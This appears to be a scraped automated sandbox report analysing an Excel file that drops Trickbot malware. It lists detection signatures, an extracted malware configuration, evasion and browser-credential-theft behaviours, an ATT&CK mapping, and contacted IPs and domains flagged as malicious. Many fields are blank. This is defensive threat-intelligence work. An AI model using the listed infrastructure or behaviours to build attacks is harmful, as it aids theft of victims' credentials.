Play interactive tourEdit tour
Analysis Report Sign-1870635479_637332644.xls
Overview
General Information
Detection
Hidden Macro 4.0 Trickbot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Adds / modifies Windows certificates
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
Threatname: Trickbot |
---|
{"gtag": "rob60", "C2 list": [], "modules": ["pwgrab", "mcconf"]}
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC |
|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
Click to see the 1 entries |
Unpacked PEs |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: |
Found malware configuration | Show sources |
Source: | Malware Configuration Extractor: |
Multi AV Scanner detection for dropped file | Show sources |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Yara detected Trickbot | Show sources |
Source: | File source: |
Source: | Code function: |
Compliance: |
---|
Uses insecure TLS / SSL version for HTTPS connection | Show sources |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Uses new MSVCR Dlls | Show sources |
Source: | File opened: |
Binary contains paths to debug symbols | Show sources |
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | Memory has grown: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
E-Banking Fraud: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: |
System Summary: |
---|
Found malicious Excel 4.0 Macro | Show sources |
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: |
Source: | Code function: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | System information queried: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Registry key monitored for changes: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Malware Analysis System Evasion: |
---|
Found evasive API chain (trying to detect sleep duration tampering with parallel thread) | Show sources |
Source: | Function Chain: |
Tries to detect virtualization through RDTSC time measurements | Show sources |
Source: | RDTSC instruction interceptor: |
Source: | Code function: |
Source: | Code function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread sleep time: |
Source: | Last function: | ||
Source: | Last function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
HIPS / PFW / Operating System Protection Evasion: |
---|
Allocates memory in foreign processes | Show sources |
Source: | Memory allocated: |
Writes to foreign memory regions | Show sources |
Source: | Memory written: | ||
Source: | Memory written: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: |
Source: | Key value queried: |
Source: | Registry key created or modified: | Jump to behavior |
Stealing of Sensitive Information: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: |
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Tries to harvest and steal browser information (history, passwords, etc) | Show sources |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Remote Access Functionality: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: |
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Extra Window Memory Injection1 | Disable or Modify Tools21 | OS Credential Dumping1 | File and Directory Discovery2 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Access Token Manipulation1 | Scripting21 | LSASS Memory | System Information Discovery114 | Remote Desktop Protocol | Data from Local System1 | Exfiltration Over Bluetooth | Encrypted Channel22 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Process Injection212 | Obfuscated Files or Information2 | Security Account Manager | Query Registry1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Extra Window Memory Injection1 | NTDS | Security Software Discovery22 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol2 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading121 | LSA Secrets | Virtualization/Sandbox Evasion1 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol13 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion1 | Cached Domain Credentials | Process Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation1 | DCSync | Remote System Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection212 | Proc Filesystem | System Network Configuration Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll321 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | Metadefender | Browse | ||
41% | ReversingLabs | Win32.Trojan.Trickpak | ||
11% | Metadefender | Browse | ||
41% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
1% | Virustotal | Browse | ||
2% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
ident.me | 176.58.123.25 | true | false |
| unknown |
chipmania.it | 185.81.0.78 | true | false |
| unknown |
38.52.17.84.zen.spamhaus.org | unknown | unknown | false | high | |
38.52.17.84.cbl.abuseat.org | unknown | unknown | false | high | |
38.52.17.84.dnsbl-1.uceprotect.net | unknown | unknown | false | unknown | |
www.chipmania.it | unknown | unknown | false |
| unknown |
38.52.17.84.b.barracudacentral.org | unknown | unknown | false | high | |
38.52.17.84.spam.dnsbl.sorbs.net | unknown | unknown | false | high |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| low | ||
false | high | |||
false |
| unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
45.155.173.242 | unknown | Germany | 30823 | COMBAHTONcombahtonGmbHDE | true | |
5.202.150.151 | unknown | Iran (ISLAMIC Republic Of) | 201150 | DIDEHABNNETIR | true | |
185.81.0.78 | unknown | Italy | 52030 | SERVERPLAN-ASIT | false | |
194.5.249.156 | unknown | Romania | 64398 | NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | false | |
193.8.194.96 | unknown | United Kingdom | 53340 | FIBERHUBUS | true | |
103.220.47.220 | unknown | Indonesia | 59290 | IDNIC-ALTRO-IDPTAltroAbiramaID | false | |
176.58.123.25 | unknown | United Kingdom | 63949 | LINODE-APLinodeLLCUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 355634 |
Start date: | 20.02.2021 |
Start time: | 09:47:13 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 48s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | Sign-1870635479_637332644.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 10 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.spyw.expl.evad.winXLS@12/14@8/7 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: | Failed |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
09:47:46 | API Interceptor | |
09:47:46 | API Interceptor | |
09:48:50 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
45.155.173.242 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
5.202.150.151 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
185.81.0.78 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
194.5.249.156 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
ident.me | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
COMBAHTONcombahtonGmbHDE | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
DIDEHABNNETIR | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
SERVERPLAN-ASIT | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
